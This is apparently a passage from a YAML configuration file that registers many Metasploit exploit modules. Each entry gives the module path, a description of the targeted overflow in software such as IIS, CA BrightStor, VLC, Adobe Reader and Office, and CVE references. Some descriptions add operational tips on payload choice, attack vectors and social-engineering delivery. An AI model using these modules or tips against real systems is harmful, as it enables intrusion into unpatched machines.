\t\t\t\tthe buffer and execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2006-6076
- - OSVDB
- "30637"
- - BID
- "21221"
- - URL
- http://www.milw0rm.com/exploits/3086
- - URL
- http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=101317
path: extensions/metasploit/
class: Msf_module
msf_etrust_itm_alert:
enable: true
msf: true
msf_key: windows/brightstor/etrust_itm_alert
name: Computer Associates Alert Notification Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in Computer Associates Threat Manager for the Enterprise r8.1\n\
\t\t\t\tBy sending a specially crafted RPC request, an attacker could overflow the buffer and execute arbitrary code.\n\
\t\t\t\tIn order to successfully exploit this vulnerability, you will need valid logon credentials to the target.\n\
\t\t\t"
authors:
- - CVE
- 2007-4620
- - OSVDB
- "44040"
- - BID
- "28605"
path: extensions/metasploit/
class: Msf_module
msf_message_engine:
enable: true
msf: true
msf_key: windows/brightstor/message_engine
name: CA BrightStor ARCserve Message Engine Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in Computer Associates BrightStor ARCserve Backup\n\
\t\t\t\t11.1 - 11.5 SP2. By sending a specially crafted RPC request, an attacker could overflow\n\
\t\t\t\tthe buffer and execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-0169
- - OSVDB
- "31318"
- - BID
- "22005"
path: extensions/metasploit/
class: Msf_module
msf_mediasrv_sunrpc:
enable: true
msf: true
msf_key: windows/brightstor/mediasrv_sunrpc
name: CA BrightStor ArcServe Media Service Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis exploit targets a stack buffer overflow in the MediaSrv RPC service of CA\n\
\t\t\t\tBrightStor Arcserve. By sending a specially crafted SUNRPC request, an attacker\n\
\t\t\t\tcan overflow a stack buffer and execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-2139
- - OSVDB
- "35326"
- - BID
- "23635"
- - URL
- https://www.zerodayinitiative.com/advisories/ZDI-07-022.html
path: extensions/metasploit/
class: Msf_module
msf_discovery_tcp:
enable: true
msf: true
msf_key: windows/brightstor/discovery_tcp
name: CA BrightStor Discovery Service TCP Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in the CA BrightStor\n\
\t\t\t\tDiscovery Service. This vulnerability occurs when a specific\n\
\t\t\t\ttype of request is sent to the TCP listener on port 41523.\n\
\t\t\t\tThis vulnerability was discovered by cybertronic[at]gmx.net\n\
\t\t\t\tand affects all known versions of the BrightStor product.\n\
\t\t\t\tThis module is based on the 'cabrightstor_disco' exploit by\n\
\t\t\t\tHD Moore.\n\
\t\t\t"
authors:
- - CVE
- 2005-2535
- - OSVDB
- "13814"
- - BID
- "12536"
- - URL
- http://archives.neohapsis.com/archives/bugtraq/2005-02/0123.html
- - URL
- http://milw0rm.com/exploits/1131
path: extensions/metasploit/
class: Msf_module
msf_lgserver_rxrlogin:
enable: true
msf: true
msf_key: windows/brightstor/lgserver_rxrlogin
name: CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup\n\
\t\t\t\tfor Laptops & Desktops 11.1. By sending a specially crafted request, an attacker could\n\
\t\t\t\toverflow the buffer and execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-5003
- - OSVDB
- "41353"
- - BID
- "24348"
path: extensions/metasploit/
class: Msf_module
msf_ms01_023_printer:
enable: true
msf: true
msf_key: windows/iis/ms01_023_printer
name: Microsoft IIS 5.0 Printer Host Header Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis exploits a buffer overflow in the request processor of\n\
\t\t\t\tthe Internet Printing Protocol ISAPI module in IIS. This\n\
\t\t\t\tmodule works against Windows 2000 service pack 0 and 1. If\n\
\t\t\t\tthe service stops responding after a successful compromise,\n\
\t\t\t\trun the exploit a couple more times to completely kill the\n\
\t\t\t\thung process.\n\
\t\t\t"
authors:
- - CVE
- 2001-0241
- - OSVDB
- "3323"
- - BID
- "2674"
- - MSB
- MS01-023
- - URL
- http://seclists.org/lists/bugtraq/2001/May/0005.html
path: extensions/metasploit/
class: Msf_module
msf_ms02_018_htr:
enable: true
msf: true
msf_key: windows/iis/ms02_018_htr
name: Microsoft IIS 4.0 .HTR Path Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis exploits a buffer overflow in the ISAPI ISM.DLL used to\n\
\t\t\t\tprocess HTR scripting in IIS 4.0. This module works against\n\
\t\t\t\tWindows NT 4 Service Packs 3, 4, and 5. The server will\n\
\t\t\t\tcontinue to process requests until the payload being\n\
\t\t\t\texecuted has exited. If you've set EXITFUNC to 'seh', the\n\
\t\t\t\tserver will continue processing requests, but you will have\n\
\t\t\t\ttrouble terminating a bind shell. If you set EXITFUNC to\n\
\t\t\t\tthread, the server will crash upon exit of the bind shell.\n\
\t\t\t\tThe payload is alpha-numerically encoded without a NOP sled\n\
\t\t\t\tbecause otherwise the data gets mangled by the filters.\n\
\t\t\t"
authors:
- - CVE
- 1999-0874
- - OSVDB
- "3325"
- - BID
- "307"
- - URL
- http://www.eeye.com/html/research/advisories/AD19990608.html
- - MSB
- MS02-018
path: extensions/metasploit/
class: Msf_module
msf_ms01_033_idq:
enable: true
msf: true
msf_key: windows/iis/ms01_033_idq
name: Microsoft IIS 5.0 IDQ Path Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the IDQ ISAPI handler for\n\
\t\t\t\tMicrosoft Index Server.\n\
\t\t\t"
authors:
- - CVE
- 2001-0500
- - OSVDB
- "568"
- - MSB
- MS01-033
- - BID
- "2880"
path: extensions/metasploit/
class: Msf_module
msf_iis_webdav_upload_asp:
enable: true
msf: true
msf_key: windows/iis/iis_webdav_upload_asp
name: Microsoft IIS WebDAV Write Access Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module can be used to execute a payload on IIS servers that\n\
\t\t\t\thave world-writeable directories. The payload is uploaded as an ASP\n\
\t\t\t\tscript using a WebDAV PUT request.\n\
\t\t\t"
authors:
- - OSVDB
- "397"
- - BID
- "12141"
path: extensions/metasploit/
class: Msf_module
msf_ms03_007_ntdll_webdav:
enable: true
msf: true
msf_key: windows/iis/ms03_007_ntdll_webdav
name: Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis exploits a buffer overflow in NTDLL.dll on Windows 2000\n\
\t\t\t\tthrough the SEARCH WebDAV method in IIS. This particular\n\
\t\t\t\tmodule only works against Windows 2000. It should have a\n\
\t\t\t\treasonable chance of success against any service pack.\n\
\t\t\t"
authors:
- - CVE
- 2003-0109
- - OSVDB
- "4467"
- - BID
- "7116"
- - MSB
- MS03-007
path: extensions/metasploit/
class: Msf_module
msf_ms01_026_dbldecode:
enable: true
msf: true
msf_key: windows/iis/ms01_026_dbldecode
name: Microsoft IIS/PWS CGI Filename Double Decode Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module will execute an arbitrary payload on a Microsoft IIS installation\n\
\t\t\t\tthat is vulnerable to the CGI double-decode vulnerability of 2001.\n\n\
\t\t\t\tNOTE: This module will leave a metasploit payload in the IIS scripts directory.\n\
\t\t\t"
authors:
- - CVE
- 2001-0333
- - OSVDB
- "556"
- - BID
- "2708"
- - MSB
- MS01-026
- - URL
- http://marc.info/?l=bugtraq&m=98992056521300&w=2
path: extensions/metasploit/
class: Msf_module
msf_vuplayer_m3u:
enable: true
msf: true
msf_key: windows/fileformat/vuplayer_m3u
name: VUPlayer M3U Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack over flow in VUPlayer <= 2.49. When\n\
\t\t\t\t\tthe application is used to open a specially crafted m3u file, an buffer is overwritten allowing\n\
\t\t\t\t\tfor the execution of arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2006-6251
- - OSVDB
- "31710"
path: extensions/metasploit/
class: Msf_module
msf_audio_wkstn_pls:
enable: true
msf: true
msf_key: windows/fileformat/audio_wkstn_pls
name: Audio Workstation 6.4.2.4.3 pls Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in Audio Workstation 6.4.2.4.3.\n\
\t\t\t\tWhen opening a malicious pls file with the Audio Workstation,\n\
\t\t\t\ta remote attacker could overflow a buffer and execute\n\
\t\t\t\tarbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2009-0476
- - OSVDB
- "55424"
- - URL
- http://www.exploit-db.com/exploits/10353
path: extensions/metasploit/
class: Msf_module
msf_galan_fileformat_bof:
enable: true
msf: true
msf_key: windows/fileformat/galan_fileformat_bof
name: gAlan 0.2.1 Buffer Overflow Exploit
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in gAlan 0.2.1\n\
\t\t\tBy creating a specially crafted galan file, an an attacker may be able\n\
\t\t\tto execute arbitrary code.\n\
\t\t\t"
authors:
- - OSVDB
- "60897"
- - URL
- http://www.exploit-db.com/exploits/10339
path: extensions/metasploit/
class: Msf_module
msf_millenium_mp3_pls:
enable: true
msf: true
msf_key: windows/fileformat/millenium_mp3_pls
name: Millenium MP3 Studio 2.0 (PLS File) Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in Millenium MP3 Studio 2.0.\n\
\t\t\t\t\tAn attacker must send the file to victim and the victim must open the file.\n\
\t\t\t\t\tAlternatively it may be possible to execute code remotely via an embedded\n\
\t\t\t\t\tPLS file within a browser, when the PLS extention is registered to Millenium MP3 Studio.\n\
\t\t\t\t\tThis functionality has not been tested in this module.\n\
\t\t\t"
authors:
- - OSVDB
- "56574"
- - URL
- http://www.exploit-db.com/exploits/9618
- - URL
- http://www.exploit-db.com/exploits/10240
path: extensions/metasploit/
class: Msf_module
msf_ca_cab:
enable: true
msf: true
msf_key: windows/fileformat/ca_cab
name: CA Antivirus Engine CAB Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in CA eTrust Antivirus 8.1.637.\n\
\t\t\t\t\tBy creating a specially crafted CAB file, an an attacker may be able\n\
\t\t\t\t\tto execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-2864
- - OSVDB
- "35245"
- - BID
- "24330"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-07-035.html
path: extensions/metasploit/
class: Msf_module
msf_hhw_hhp_contentfile_bof:
enable: true
msf: true
msf_key: windows/fileformat/hhw_hhp_contentfile_bof
name: HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in HTML Help Workshop 4.74\n\
\t\t\t\t\tBy creating a specially crafted hhp file, an an attacker may be able\n\
\t\t\t\t\tto execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2006-0564
- - OSVDB
- "22941"
- - URL
- http://www.exploit-db.com/exploits/1470
- - URL
- http://www.exploit-db.com/exploits/1495
path: extensions/metasploit/
class: Msf_module
msf_ms09_067_excel_featheader:
enable: true
msf: true
msf_key: windows/fileformat/ms09_067_excel_featheader
name: Microsoft Excel Malformed FEATHEADER Record Vulnerability
category: Metasploit
description: "\n\
\t\t\t\t\t\tThis module exploits a vulnerability in the handling of the FEATHEADER record\n\
\t\t\t\t\tby Microsoft Excel. Revisions of Office XP and later prior to the release of the\n\
\t\t\t\t\tMS09-067 bulletin are vulnerable.\n\n\
\t\t\t\t\tWhen processing a FEATHEADER (Shared Feature) record, Microsoft used a data\n\
\t\t\t\t\tstructure from the file to calculate a pointer offset without doing proper\n\
\t\t\t\t\tvalidation. Attacker supplied data is then used to calculate the location of an\n\
\t\t\t\t\tobject, and in turn a virtual function call. This results in arbitrary code\n\
\t\t\t\t\texection.\n\n\
\t\t\t\t\tNOTE: On some versions of Office, the user will need to dismiss a warning dialog\n\
\t\t\t\t\tprior to the payload executing.\n\
\t\t\t\t"
authors:
- - CVE
- 2009-3129
- - OSVDB
- "59860"
- - MSB
- MS09-067
- - BID
- "36945"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-09-083/
- - URL
- http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=832
path: extensions/metasploit/
class: Msf_module
msf_a-pdf_wav_to_mp3:
enable: true
msf: true
msf_key: windows/fileformat/a-pdf_wav_to_mp3
name: A-PDF WAV to MP3 v1.0.0 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in A-PDF WAV to MP3 v1.0.0. When\n\
\t\t\t\tthe application is used to import a specially crafted m3u file, a buffer overflow occurs\n\
\t\t\t\tallowing arbitrary code execution.\n\
\t\t\t"
authors:
- - OSVDB
- "67241"
- - URL
- http://www.exploit-db.com/exploits/14676/
- - URL
- http://www.exploit-db.com/exploits/14681/
path: extensions/metasploit/
class: Msf_module
msf_emc_appextender_keyworks:
enable: true
msf: true
msf_key: windows/fileformat/emc_appextender_keyworks
name: EMC ApplicationXtender (KeyWorks) ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the KeyWorks KeyHelp Activex Control\n\
\t\t\t\t(KeyHelp.ocx 1.2.3120.0). This Activex Control comes bundled with EMC's\n\
\t\t\t\tDocumentation ApplicationXtender 5.4.\n\
\t\t\t"
authors:
- - OSVDB
- "58423"
- - BID
- "36546"
path: extensions/metasploit/
class: Msf_module
msf_adobe_libtiff:
enable: true
msf: true
msf_key: windows/fileformat/adobe_libtiff
name: Adobe Acrobat Bundled LibTIFF Integer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits an integer overflow vulnerability in Adobe Reader and Adobe Acrobat\n\
\t\t\t\tProfessional versions 8.0 through 8.2 and 9.0 through 9.3.\n\
\t\t\t"
authors:
- - CVE
- 2010-0188
- - BID
- "38195"
- - OSVDB
- "62526"
- - URL
- http://www.adobe.com/support/security/bulletins/apsb10-07.html
- - URL
- http://secunia.com/blog/76/
- - URL
- http://bugix-security.blogspot.com/2010/03/adobe-pdf-libtiff-working-exploitcve.html
path: extensions/metasploit/
class: Msf_module
msf_proshow_cellimage_bof:
enable: true
msf: true
msf_key: windows/fileformat/proshow_cellimage_bof
name: ProShow Gold v4.0.2549 (PSH File) Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in ProShow Gold v4.0.2549.\n\
\t\t\t\tAn attacker must send the file to victim and the victim must open the file.\n\
\t\t\t"
authors:
- - CVE
- 2009-3214
- - OSVDB
- "57226"
- - URL
- http://www.exploit-db.com/exploits/9483
- - URL
- http://www.exploit-db.com/exploits/9519
path: extensions/metasploit/
class: Msf_module
msf_etrust_pestscan:
enable: true
msf: true
msf_key: windows/fileformat/etrust_pestscan
name: CA eTrust PestPatrol ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in CA eTrust PestPatrol. When\n\
\t\t\t\tsending an overly long string to the Initialize() property of ppctl.dll (5.6.7.9)\n\
\t\t\t\tan attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2009-4225
- - OSVDB
- "60862"
- - URL
- http://www.my-etrust.com/Extern/RoadRunner/PestScan/scan.htm
path: extensions/metasploit/
class: Msf_module
msf_safenet_softremote_groupname:
enable: true
msf: true
msf_key: windows/fileformat/safenet_softremote_groupname
name: SafeNet SoftRemote GROUPNAME Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in SafeNet SoftRemote\n\
\t\t\t\tSecurity Policy Editor <= 10.8.5. When an attacker\n\
\t\t\t\tcreates a specially formatted security policy with an\n\
\t\t\t\toverly long GROUPNAME argument, it is possible to execute\n\
\t\t\t\tarbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2009-3861
- - OSVDB
- "59660"
- - URL
- http://www.senseofsecurity.com.au/advisories/SOS-09-008
path: extensions/metasploit/
class: Msf_module
msf_mjm_quickplayer_s3m:
enable: true
msf: true
msf_key: windows/fileformat/mjm_quickplayer_s3m
name: MJM QuickPlayer 1.00 beta 60a / QuickPlayer 2010 .s3m Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in MJM QuickPlayer 1.00 beta 60a\n\
\t\t\t\tand QuickPlayer 2010 (Multi-target exploit). When opening a malicious s3m file in\n\
\t\t\t\tone of these 2 applications, a stack buffer overflow can be triggered, resulting in\n\
\t\t\t\tarbitrary code execution.\n\n\
\t\t\t\tThis exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7. \n\
\t\t\t"
authors:
- - OSVDB
- "72102"
- - URL
- http://www.corelan.be/advisories.php?id=CORELAN-11-003
path: extensions/metasploit/
class: Msf_module
msf_mini_stream:
enable: true
msf: true
msf_key: windows/fileformat/mini_stream
name: Mini-Stream 3.0.1.1 Buffer Overflow Exploit
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Mini-Stream 3.0.1.1\n\
\t\t\t\tBy creating a specially crafted pls file, an an attacker may be able\n\
\t\t\t\tto execute arbitrary code.\n\
\t\t\t"
authors:
- - OSVDB
- "61341"
- - URL
- http://www.exploit-db.com/exploits/10745
path: extensions/metasploit/
class: Msf_module
msf_adobe_pdf_embedded_exe:
enable: true
msf: true
msf_key: windows/fileformat/adobe_pdf_embedded_exe
name: Adobe PDF Embedded EXE Social Engineering
category: Metasploit
description: "\n\
\t\t\t\t\tThis module embeds a Metasploit payload into an existing PDF file. The\n\
\t\t\t\tresulting PDF can be sent to a target as part of a social engineering attack.\n\
\t\t\t"
authors:
- - CVE
- 2010-1240
- - OSVDB
- "63667"
- - URL
- http://blog.didierstevens.com/2010/04/06/update-escape-from-pdf/
- - URL
- http://blog.didierstevens.com/2010/03/31/escape-from-foxit-reader/
- - URL
- http://blog.didierstevens.com/2010/03/29/escape-from-pdf/
path: extensions/metasploit/
class: Msf_module
msf_blazedvd_plf:
enable: true
msf: true
msf_key: windows/fileformat/blazedvd_plf
name: BlazeDVD 5.1 PLF Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack over flow in BlazeDVD 5.1. When\n\
\t\t\t\t\tthe application is used to open a specially crafted plf file,\n\
\t\t\t\t\ta buffer is overwritten allowing for the execution of arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2006-6199
- - OSVDB
- "30770"
- - BID
- "35918"
path: extensions/metasploit/
class: Msf_module
msf_fdm_torrent:
enable: true
msf: true
msf_key: windows/fileformat/fdm_torrent
name: Free Download Manager Torrent Parsing Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Free Download Manager\n\
\t\t\t\t3.0 Build 844. Arbitrary code execution could occur when parsing a\n\
\t\t\t\tspecially crafted torrent file.\n\
\t\t\t"
authors:
- - CVE
- 2009-0184
- - OSVDB
- "54033"
- - BID
- "33555"
- - URL
- http://freedownload.svn.sourceforge.net/viewvc/freedownload/FDM/vmsBtDownloadManager.cpp?r1=11&r2=18
- - URL
- http://freedownload.svn.sourceforge.net/viewvc/freedownload/FDM/Bittorrent/fdmbtsupp/vmsBtFileImpl.cpp?r1=9&r2=18
- - URL
- http://secunia.com/secunia_research/2009-5/
- - URL
- http://downloads.securityfocus.com/vulnerabilities/exploits/33555-SkD.pl
path: extensions/metasploit/
class: Msf_module
msf_xion_m3u_sehbof:
enable: true
msf: true
msf_key: windows/fileformat/xion_m3u_sehbof
name: Xion Audio Player 1.0.126 Unicode Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Xion Audio Player prior to version\n\
\t\t\t\t1.0.126. The vulnerability is triggered when opening a malformed M3U file that\n\
\t\t\t\tcontains an overly long string. This results in overwriting a\n\
\t\t\t\tstructured exception handler record.\n\
\t\t\t"
authors:
- - OSVDB
- "66912"
- - URL
- http://www.exploit-db.com/exploits/14517
- - URL
- http://www.exploit-db.com/exploits/14633
- - URL
- http://www.exploit-db.com/exploits/15598
path: extensions/metasploit/
class: Msf_module
msf_orbital_viewer_orb:
enable: true
msf: true
msf_key: windows/fileformat/orbital_viewer_orb
name: Orbital Viewer ORB File Parsing Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in David Manthey's\n\
\t\t\t\tOrbital Viewer. When processing .ORB files, data is read from file into\n\
\t\t\t\ta fixed-size stack buffer using the fscanf function. Since no bounds\n\
\t\t\t\tchecking is done, a buffer overflow can occur. Attackers can execute\n\
\t\t\t\tarbitrary code by convincing their victim to open an ORB file.\n\
\t\t\t"
authors:
- - BID
- "38436"
- - OSVDB
- "62580"
- - CVE
- 2010-0688
- - URL
- http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-011-orbital-viewer-orb-buffer-overflow/
- - URL
- http://www.exploit-db.com/exploits/11581
path: extensions/metasploit/
class: Msf_module
msf_ms10_004_textbytesatom:
enable: true
msf: true
msf_key: windows/fileformat/ms10_004_textbytesatom
name: Microsoft PowerPoint Viewer TextBytesAtom Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow vulnerability in the handling of\n\
\t\t\t\tthe TextBytesAtom records by Microsoft PowerPoint Viewer. According to Microsoft,\n\
\t\t\t\tthe PowerPoint Viewer distributed with Office 2003 SP3 and earlier, as well as\n\
\t\t\t\tOffice 2004 for Mac, are vulnerable.\n\n\
\t\t\t\tNOTE: The vulnerable code path is not reachable on versions of Windows prior to\n\
\t\t\t\tWindows Vista.\n\
\t\t\t"
authors:
- - CVE
- 2010-0033
- - OSVDB
- "62241"
- - MSB
- MS10-004
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-10-017/
- - URL
- http://www.snoop-security.com/blog/index.php/2010/03/exploiting-ms10-004-ppt-viewer/
path: extensions/metasploit/
class: Msf_module
msf_videolan_tivo:
enable: true
msf: true
msf_key: windows/fileformat/videolan_tivo
name: VideoLAN VLC TiVo Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in VideoLAN VLC 0.9.4.\n\
\t\t\t\tBy creating a malicious TY file, a remote attacker could overflow a\n\
\t\t\t\tbuffer and execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2008-4654
- - OSVDB
- "49181"
- - BID
- "31813"
path: extensions/metasploit/
class: Msf_module
msf_visio_dxf_bof:
enable: true
msf: true
msf_key: windows/fileformat/visio_dxf_bof
name: Microsoft Office Visio VISIODWG.DLL DXF File Handling Vulnerability
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack based overflow vulnerability in the handling\n\
\t\t\t\tof the DXF files by Microsoft Visio 2002. Revisions prior to the release of\n\
\t\t\t\tthe MS bulletin MS10-028 are vulnerable. The overflow occurs when the application\n\
\t\t\t\tis used to import a specially crafted DXF file, while parsing the HEADER section\n\
\t\t\t\tof the DXF file.\n\n\
\t\t\t\tTo trigger the vulnerability an attacker must convince someone to insert a\n\
\t\t\t\tspecially crafted DXF file to a new document, go to 'Insert' -> 'CAD Drawing'\n\
\t\t\t\t"
authors:
- - CVE
- 2010-1681
- - OSVDB
- "64446"
- - BID
- "39836"
- - URL
- http://www.coresecurity.com/content/ms-visio-dxf-buffer-overflow
- - URL
- http://www.exploit-db.com/moaub-8-microsoft-office-visio-dxf-file-stack-overflow/
path: extensions/metasploit/
class: Msf_module
msf_audiotran_pls:
enable: true
msf: true
msf_key: windows/fileformat/audiotran_pls
name: Audiotran 1.4.1 (PLS File) Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in Audiotran 1.4.1.\n\
\t\t\t\tAn attacker must send the file to victim and the victim must open the file.\n\
\t\t\t\tAlternatively it may be possible to execute code remotely via an embedded\n\
\t\t\t\tPLS file within a browser, when the PLS extention is registered to Audiotran.\n\
\t\t\t\tThis functionality has not been tested in this module.\n\
\t\t\t"
authors:
- - CVE
- 2009-0476
- - OSVDB
- "55424"
- - URL
- http://www.exploit-db.com/exploits/11079
path: extensions/metasploit/
class: Msf_module
msf_moxa_mediadbplayback:
enable: true
msf: true
msf_key: windows/fileformat/moxa_mediadbplayback
name: MOXA MediaDBPlayback ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in MOXA_ActiveX_SDK. When\n\
\t\t\t\tsending an overly long string to the PlayFileName() of MediaDBPlayback.DLL (2.2.0.5)\n\
\t\t\t\tan attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - OSVDB
- "68986"
- - URL
- http://www.moxa.com
path: extensions/metasploit/
class: Msf_module
msf_ultraiso_cue:
enable: true
msf: true
msf_key: windows/fileformat/ultraiso_cue
name: UltraISO CUE File Parsing Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in EZB Systems, Inc's\n\
\t\t\t\tUltraISO. When processing .CUE files, data is read from file into a\n\
\t\t\t\tfixed-size stack buffer. Since no bounds checking is done, a buffer overflow\n\
\t\t\t\tcan occur. Attackers can execute arbitrary code by convincing their victim\n\
\t\t\t\tto open an CUE file.\n\n\
\t\t\t\tNOTE: A file with the same base name, but the extension of \"bin\" must also\n\
\t\t\t\texist. Opening either file will trigger the vulnerability, but the files must\n\
\t\t\t\tboth exist.\n\
\t\t\t"
authors:
- - CVE
- 2007-2888
- - OSVDB
- "36570"
- - BID
- "24140"
- - URL
- http://www.exploit-db.com/exploits/3978
path: extensions/metasploit/
class: Msf_module
msf_activepdf_webgrabber:
enable: true
msf: true
msf_key: windows/fileformat/activepdf_webgrabber
name: activePDF WebGrabber ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in activePDF WebGrabber 3.8. When\n\
\t\t\t\tsending an overly long string to the GetStatus() method of APWebGrb.ocx (3.8.2.0)\n\
\t\t\t\tan attacker may be able to execute arbitrary code. This control is not marked safe\n\
\t\t\t\tfor scripting, so choose your attack vector accordingly.\n\n\
\t\t\t"
authors:
- - OSVDB
- "64579"
- - URL
- http://www.activepdf.com/products/serverproducts/webgrabber/
path: extensions/metasploit/
class: Msf_module
msf_nuance_pdf_launch_overflow:
enable: true
msf: true
msf_key: windows/fileformat/nuance_pdf_launch_overflow
name: Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Nuance PDF Reader v6.0. The vulnerability is\n\
\t\t\t\t\ttriggered when opening a malformed PDF file that contains an overly long string in a /Launch field. This results in overwriting a structured exception handler record.\n\
\t\t\t\t\tThis exploit does not use javascript.\n\
\t\t\t"
authors:
- - OSVDB
- "68514"
- - URL
- http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-062-stack-buffer-overflow-in-nuance-pdf-reader-v6-0/
path: extensions/metasploit/
class: Msf_module
msf_lotusnotes_lzh:
enable: true
msf: true
msf_key: windows/lotus/lotusnotes_lzh
name: Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview(.lzh attachment)
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in Lotus Notes 8.5.2 when\n\
\t\t\t\tparsing a malformed, specially crafted LZH file. This vulnerability was\n\
\t\t\t\tdiscovered binaryhouse.net\n\n\
\t\t\t"
authors:
- - CVE
- 2011-1213
- - OSVDB
- "72706"
- - BID
- "48018"
- - URL
- http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=904
- - URL
- http://www.ibm.com/support/docview.wss?uid=swg21500034
path: extensions/metasploit/
class: Msf_module
msf_vuplayer_cue:
enable: true
msf: true
msf_key: windows/fileformat/vuplayer_cue
name: VUPlayer CUE Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack over flow in VUPlayer <= 2.49. When\n\
\t\t\t\tthe application is used to open a specially crafted cue file, an buffer is overwritten allowing\n\
\t\t\t\tfor the execution of arbitrary code.\n\
\t\t\t"
authors:
- - OSVDB
- "64581"
- - BID
- "33960"
path: extensions/metasploit/
class: Msf_module
msf_mcafee_hercules_deletesnapshot:
enable: true
msf: true
msf_key: windows/fileformat/mcafee_hercules_deletesnapshot
name: McAfee Remediation Client ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in McAfee Remediation Agent 4.5.0.41. When\n\
\t\t\t\tsending an overly long string to the DeleteSnapshot() method\n\
\t\t\t\tof enginecom.dll (3.7.0.9) an attacker may be able to execute arbitrary code.\n\
\t\t\t\tThis control is not marked safe for scripting, so choose your attack vector accordingly.\n\
\t\t\t"
authors:
- - URL
- http://www.metasploit.com
path: extensions/metasploit/
class: Msf_module
msf_vlc_smb_uri:
enable: true
msf: true
msf_key: windows/fileformat/vlc_smb_uri
name: VideoLAN Client (VLC) Win32 smb:// URI Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in the Win32AddConnection\n\
\t\t\t\tfunction of the VideoLAN VLC media player. Versions 0.9.9 throught 1.0.1 are\n\
\t\t\t\treportedly affected.\n\n\
\t\t\t\tThis vulnerability is only present in Win32 builds of VLC.\n\n\
\t\t\t\tThis payload was found to work with the windows/exec and\n\
\t\t\t\twindows/meterpreter/reverse_tcp payloads. However, the\n\
\t\t\t\twindows/meterpreter/reverse_ord_tcp was found not to work.\n\
\t\t\t"
authors:
- - BID
- "35500"
- - OSVDB
- "55509"
- - CVE
